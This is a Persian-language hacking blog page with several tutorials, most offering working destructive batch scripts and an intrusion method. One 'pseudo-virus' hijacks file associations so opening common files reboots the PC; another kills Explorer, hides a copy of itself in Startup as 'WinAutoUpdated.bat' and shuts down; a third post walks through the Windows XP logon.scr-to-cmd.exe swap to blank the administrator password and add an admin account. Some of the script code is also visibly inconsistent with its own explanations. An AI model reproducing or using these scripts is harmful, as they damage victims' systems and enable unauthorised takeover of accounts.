| تبليغات | X |
HackMind |
All About Computer |
|
درباره وبلاگ
 منوی اصلی
آرشیو مطالب
لينك دوستان
آخرین مقالات
آرشیو موضوعی
آمار سايت
del.icio.us
|
ساخت يك شبه ويروس قسمت دوم
خوب امروز هم می خوام به ساخت یه شبه ویروس ساده دیگه بپردازم امیدوارم خوشتون بیاد.
البته بازم ميگم من اين نوع فايلها يعني bat. و cmd. رو اصلا ويروس حساب نمي يارم چون خيلي تابلو و ضعيفن و قصدم آموزش فرمانهاي پيشرفته ويندوزه حالا خودتون هر چي مي خواين بهش بگين. اينجا بصورت خلاصه همون ويروس مي گيم.
بريم سره اصل مطلب !!
اين ويروس چكار ميکنه :
اين ويروس يكسري تغييرات در رجيستري ويندوز ميده كه باعث ميشه كه وقتي ما يكي از اين فرمتها يعني txt, exe, jpg, mp3 را اجرا كرديم فرمان shutdown اجرا مي شه و سيستم و رستارت مي كنه.
شما خودتون بعدا مي تونيد هر فرمتي رو اضافه كنيد.
سورس ويروس:
@echo off
rem ------------mp3 file------------------ reg add HKCR\.mp3 /f /ve /d "mp3file" > nul reg add HKCR\mp3file > nul reg add HKCR\mp3file\shell > nul reg add HKCR\mp3file\shell\open > nul reg add HKCR\mp3file\shell\open\command /f /ve /d %C% > nul rem -------------------------------------- rem ------------txt file------------------
reg add HKCR\.txt /f /ve /d "txtfile"> nul reg add HKCR\txtfile > nul reg add HKCR\txtfile\shell > nul reg add HKCR\txtfile\shell\open > nul reg add HKCR\txtfile\shell\open\command /f /ve /d %C% > nul rem -------------------------------------- rem ------------jpg file------------------
reg add HKCR\.jpg /f /ve /d "txtfile"> nul reg add HKCR\jpgfile > nul reg add HKCR\jpgfile\shell > nul reg add HKCR\jpgfile\shell\open > nul reg add HKCR\jpgfile\shell\open\command /f /ve /d %C% > nul rem -------------------------------------- rem ------------exe file------------------
reg add HKCR\.txt /f /ve /d "txtfile"> nul reg add HKCR\txtfile > nul reg add HKCR\txtfile\shell > nul reg add HKCR\txtfile\shell\open > nul reg add HKCR\txtfile\shell\open\command /f /ve /d %C% > nul rem -------------------------------------- rem --------------value of C-------------
set C="shutdown -r -t 0" rem -------------------------------------- توضيحات :
اين سورس زياد توضيح نمي خواد پس من هم فقط دستور reg رو كه بيشتر هم استفاده شده توضيح ميدم
شما با دستور reg مي تونيد در رجيستري هر تغييري مي خواين انجام بدين البته محدوديت هايي هم داره ولي مي شه فرمان قويي در ويندوز حساب مياد و داراي پارامتر هاي زيادي هست كه ما فقط پارمتر add رو توضيح ميدیم براي اطلاعات بيشتر هم فرمان زير رو در خط فرمان تايپ كنيد
reg /?
صورت كلي قرمان reg add به اين صورته
REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f]
كه به ترتيب :
ADD : براي اضافه كردن يك كليد يا تغيير مقدار يك كليد
KeyName : آدرس شاخه ي مورد نظر در رجيستري
v ValueName/ : مقداري را اضافه كرده يا تغيير ميدهد
ve/ : مقدار پيش فرض را مشخص مي كند
t type/ : نوع متغيير
d data/ : دادهاي است كه به مقادير جديد يا مقادير موحود منسوب مي شود
f/ : براي تغييراتي كه مي دهد سوالي از كاربر نمي پرسد
البته براي فهم بهتر ، بهتره كمي با ساختار فايلها در رجيستري آشنا باشيد.
حالا با اين سورس چكار كنيم؟
حوب اينم كه معلومه notepad يا هر ويراشگري كه باهاش راحتين رو باز كنيد و سورس رو داخلش قرار دهيد بعد با فرمت bat. یا cmd. ذخيره كنيد
اگر كامپيوتري اين فايل رو اجرا كرد چگونه مي شه تعميرش كرد؟
1- اگر از رجيستري نسخه پشتيباني وجود داشته باشد
2 - كاربر از ساختار رجيستري به خوبي آگاه باشد و خود تعميرش كند.
در غير اين صورت فكر كنم چارهاي جز نصب دوباره ويندوز نداشته باشد
خوب اميدوارم استفاده لازم رو برده باشيد و در امر يادگيري ازش استفاده كنيد
در ضمن هر گونه مشكل و انتقاد يا پيشنهادي هم دارين ممنون مي شم كه بيان كنيد
موفق باشيد
|+| نوشته شده توسط BlZbB در یکشنبه بیست و پنجم دی 1384 | موضوع: دیگر مقالات  چگونگي پاك كردن برناهايي كه در ليست Add/Remove Winddows Components قرار ندارد!!
ما وقتي ويندوز رو نصب مي كنيم يه سري برنامه هم همراه ويندوز بدون اجازه ما نصب ميشه و بصورت معمولي هم امكاني براي پاك كردن آنها در اختيار كاربران ويندوز قرار نميگيري برنامه هايي از اين قبيل مثل MSN Messenger و WordPad و ...
خوب امروز مي خوام بهتون ياد بدم اين طور برنامه ها رو چطور پاك كنيد
خوب ابتدا وارد شاخه C:\WINDOWS\inf بشين (C را درايو پيشفرض كه ويندوز روش نصبه مي گيريم)
بعد فايل sysoc.inf را پيدا كنيد. بعد با هر ويرايشگري كه باهاش راحتين مثل notepad بازش كنيد.
داخل فايل قسمتي هست كه اينو نوشته
[Components]
حالا مثلا ما بخوايم MSN Messenger رو پاك كنيم اول دنبال اين عبارت مي گرديم :
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
بعد كلمه hide رو از داخلش پاك مي كنيم به اين صورت بشه
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,7
حالا فايل رو ذخيره مي كنيم و از Notepad خارج مي شيم.
حالا واردControl Panel\Add or Remove Programs بشين بعد قسمت Add/Remove Winddows Components رو انتخاب كنيد. بعد اينكه صفحه مر بوطه آمد ليست رو يين بياوريد و دو عبارت
Windows Messenger
Windows Messenger
ديده مي شود حالا هر دو را پاك كنيد(دو تا عبارت هم نام هستند)
براي ديگر برنامه هايي كه در اين ليست ديده نمي شود هم همينطوره فقط بايد داخل فايل sysoc.inf بشين و وقتي خطي كه مزبوط به برنامه مورد نظرتون هست كلمه hide رو ازش پاك كنيد.
خوب اين مقاله هم تموم شد. اميدوارم استفاده لازم رو ببريد.
موفق باشيد
|+| نوشته شده توسط BlZbB در دوشنبه نوزدهم دی 1384 | موضوع: دیگر مقالات ساخت يك شبه ويروس بخش اول !!
خوب ما ديدم اكثر وبلاگا يك شبه ويروس معرفي مي كنند ما هم گفتيم يه هميچين چيزي بسازيم و معرفي كنيم با اين تفاوت كه بعد معرفي به برسي خط به خطش مي پردازيم البته قصد منم همينه يعني آشنايي شما با فرامين داس و فرامين پيشرفته در ويندوزهاي سري NT مثل xp ، 2000 و .... اين شبه ويروس رو بايد تو Notepad كپي بعد با فرمت .bat يا .cmd ذخيره كنيد(خوب اينو كه همه بلدن) البته ممكنه بعضي از شما بگين اين حتي شبيه يه ويروس عصر حاظر هم نيست . اصلا ويروس نيست (مثل خود من). ولي چون آثار مخربي داره همون شبه ويروس مي خوانيمش. و گفتم قصدم هم فقط آشنايي شما با ديگر فرامين داس و پيشرفته ويندوزه. كار اين شبه ويروس چيه: اين شبه ويروس فايل explorer.exe روي كلا از روي سيستم شما پاك مي كنه (البته اگه backup ديگه روي سيستم نباشه). و تنها راهشم rapair كردن ويندوز با cd ويندوز كه فكر اينجاشم كردم. اگر مي خواهيد بدونيد بعد اجراي اين ويروس چه اتفاقي مي افته فقط كافيه اين فرمان رو در خط فرمان وارد كنيد. taskkill /F /IM explorer.exe و براي برگرداندن به حالت اول اين فرمان رو وارد كنيد. %systemroot%\explorer.exe هيچ خطري هم نداره (امتحان كنيد) ولي بعد اينكه اين شبه ويروس اجرا بشه فايل explorer.exe هم كامل پاك مي شه براي هميشه يا زماني كه تعمير بشه همينجوري مي مونه و اما ويروس ما @echo off taskkill /F /IM explorer.exe > nul attrib -s -h %systemroot%\system32\dllcache > nul copy \readme.bat "%USERPROFILE%\Start Menu\Programs\Startup\WinAutoUpdated.bat" > nul attrib +h +s "%USERPROFILE%\Start Menu\Programs\Startup\WinAutoUpdated.bat" > nul shutdown -s -t 0 برسي كد شبه ويروس: خط اول: اين دستور براي اين هست كه فرامين خط فرمان در صفحه نمايش ظاهر نشن. خط دوم: فرمان taskkill يكي از فرامين پيشرفته ويندوزهاي سري NT هست. كارش اينه كه يه فايل يا يه برنامه در حال اجرا رو از حافظه خارج مي كنه يا به عبارتي مي كشه(kill). پارامتر /F : براي سرعت بخشيدن به اين عمل هست پارامتر /IM : اگر شما وارد Windows Task Manager بشين به به سربرگ Processes برين ليستي از از برنامه ها و فايلهاي سيستمي ويندوز رو مي بينيد كه در رم قرار دارد و اگه مثلا ما به خوايم فايل explorer.exe رو خارج كنيم بايد اسمشو جلوي اين پارامتر قرار دهيد. نكته : فرمان > nul كه در جلوي هر خط ديده ني شه براي اينه كه نتيجه كه از خط فرمان به صفحه نمايش فرستاده مي شه ديده نشه. خط سوم : فرمان attrib يكي از فرمان هاي داس هست كه مي تويند خصوصيات Read-only ، Hidden ، Archive و System يك فايل رو تغيير بدين. پارامتر –h يعني Hidden پارامتر –s هم يعني System (اين خصويات فقط براي فايل هاي سيستمي هست كه در واقع دو بار مخفي مي شن) خط چهارم و پنجم :فرمان del هم كه خيلي تابلوي . باهاش يك فايل يا يه دسته فايل رو مي شه پاك كرد. خط شش: فرمان كپي كه يك كپي از يك فايل در جاي ديگه مي گيره. اينجا ما از فايلمون يه كپي به نام WinAutoUpdated.bat در شاخه startup كاربر قرار مي ديم كه اگه يه وقت ويندوزو تعمير كر دوبار اجرا بشه. خط هفتم: فرمان attrib رو قبلا توضيح دادم. فقط بگم كه اينجا ما فايمون رو از نوع سيستمي مي كنيم كه از ديد كاربر پنهان بشه. خط هشتم : فرمان shutdown هم كم كه ديگه الان همه ميش ناسن و نيازي به توضيح نداره فقط براي اونايي كه نمي دونن بگم كه براي خواموش كردن سيستم. خوب اميدوارم خوشتون امده باشه. اگه مشكل يا سوالي داريد بگين تا اگه بتونم رفع كنم يه نكته ديگه: چون در ايران قانوني به نام "كپي رايت" يا همون "حق ديگران" نداريم شما مي تونيد از تمام مطالب اين وبلاگ در وبلاگ يا سايت خود استفاده كنيد تا موقعي كه يه قانون درست و حسابي برقرار بشه. موفق باشيد. |+| نوشته شده توسط BlZbB در پنجشنبه پانزدهم دی 1384 | موضوع: دیگر مقالات طريقه هك كردن منوي start و تغيير آن در ويندوز XP Professional !!
شاید برای شما هم جالب باشه که بتونید آیکون منوی Start يا نوشته "Start" آن را به ميل خودتون تغيير بدين.
خوب امروز مي خوام به شما ياد بدم چطور اين كارو بكنيد(خيلي سادس)
به دليل وجود عكس و احتمالا دير آمدن صفحه براي عدهاي از دوستان كه سرعت خوبي ندارن بر روي ادامه مطلب كليك كنيد. ادامه مطلب |+| نوشته شده توسط BlZbB در دوشنبه پنجم دی 1384 | موضوع: دیگر مقالات هک کردن پسورد ویندوز xp در سرويس پك 1 و نسخه هاي پايين تر!!
امروز اولين مقاله اي كه ميزارم و مي خوام روشي ساده به شما ياد بدم كه به راحتي پسورد ويندوز Xp عوض كنيد(روي ويندوز ۲۰۰۰ تست نكردم نمي دونم جواب مي ده)
اين آموزش روي ويندوزهاي XP كه داراي سرويس پك ۱ و نسخههاي پايين تر هستن جواب ميده.
ما توسط باگي كه در نسخه هاي ذكر شده وجود داره به راحتي مي تونيم پسورد ويندوز رو تغيير يا پاك كنيم.
خوبه به چه صورت؟
مراحل به اين صورته(البته براي فهم بهتر بايد كمي با فرمانهاي داس آشنا باشين):
۱ - شما مي تونيد از طريق يه يوزر محدود(غير از ادمين) وارد ويندوز بشين يا با استفاده از يه ديسكت بوتيبل(bootable)، حالا به هر طريقي درست شده باشه سيستم رو بوت كنيد.
2 - خوب حالا اگه با يه يوزر محدود وارد شده ايد اين دستورات رو وارد كنيد تا وارد command promt بشيم
از منوي start وارد run بشين و دستور cmd رو وارد كنيد (به صورت خلاصشم گزاشتم):
start > Run > cmd (ENTER)
و اگر با ديسكت بوت كردين فقط اين فرمان رو تايپ كنيد(با فزض اين كه ويندوز شما روي درايو C نصب شده باشد)
C:
3 - حالا اين دستورات رو به ترتيب وارد كنيد :
cd\
cd \windows\system32
md mybackup
copy logon.scr mybackup
copy cmd.exe mybackup
del logon.scr
copy cmd.exe logon.scr
شرح خط به خط كاري كه الان انجام داديم
خط اول : به ريشه مي پريم(منظور همون درايو C هست)
خط دوم: وارد شاخه windows\sytem32 ميشيم
خط سوم: يه فولدر با نام mybackup يا هرنام ديگه كه ميلتونه مي سازيم
خط چهارم: يه كپي از فايل logon.scr در فولدري كه ساختيم يعني mybackup قرار مي ديم. (لازم به ذكره كه فايله logon.scr يك اسكرين سيور هست. كه وقتي در صفحه وارد كردن يوزر و پسورد ما 10 دقيقه صبر مي كنيم اين اسكرين سيور نمبيان ميشود)
خط پنجم: يه كپي از فايل cmd.exe در پوشه اي كه ساختيم قرار ميديم.
خط ششم: حالا فايل logon.scr رو پاك مي كنيم
خط هفتم: يكي كپي از فايل cmd.exe رو با نام logon.scr در داركتوري windows\system32 كه قبلا داخلش شديم مي گيريم (در واقع ما مي خوايم به جاي اسكرين سيور خط فرمان داس برايمان اجرا بشه)
4 - خوب ما تا اينجا قسمت وقت گير كار رو انجام داديم حالا بايد يه رستارت بديم تا به جايي برسيم كه از ما يوزر و پسورد بخواد و حدودا 10 دقيقه صبر مي كنيم بدون اينكه موس رو تكون بديم يه چيزي تايپ كنيم تا اسكرين سيور(الان منظورم خط فرمان داس كه با فايل اسكرين سيور عوضش كرديم) بياد.
5 - وقتي خط فرمان آمد با فرمان هاي زير مي تونيم پسورد ويندوز رو تغيير، پاك يا حتي يه يوزر اضافه كنيم.
خوب براي پاك كردن پسورد ادمين(administrator) از اين فرمان(براي تغيير هم داخل "" هرچي مي خواين بزارين) :
net user administrator ""
براي ساخت يه يوزر از اين دستور(كه به جاي username يوزر مورد نظر و به جاي password هم پسورد مورد نظر):
net user username password /add
حالا براي اينكه سطح دسرسي يوزري كه ساختيم به administrator برسونيم از اين دستور استفاده مي كنيم(كه به جاي username يوزري كه ساخيم رو قرار ميديم):
net localgroup administrator username /add
6 - خوب حالا با دستور exit از خط فرمان خارج بشين و با يوزر administrator يا هر يوزري كه ساخيت وارد بشين.
و بعد داخل شدن هم به شاخه windows\system32\mybackup برين و هر چي تو فولدر mybackup گزاشتين رو به شاخه windows\system32 بر گردونيد و فولدر mybackup رو پاك كنيد اين كارا رو ديگه با خود ويندوز مي تونيد بكنيد و نيازي به وارد شدن به خط فرمان رو هم نداره
خوب اينم از آموزش ما اميدوارد استفاده لازم رو برده باشين.(اگر موردي چيزي داشتين بگين تا رفع كنيم)
|+| نوشته شده توسط BlZbB در دوشنبه پنجم دی 1384 | موضوع: دیگر مقالات |
|
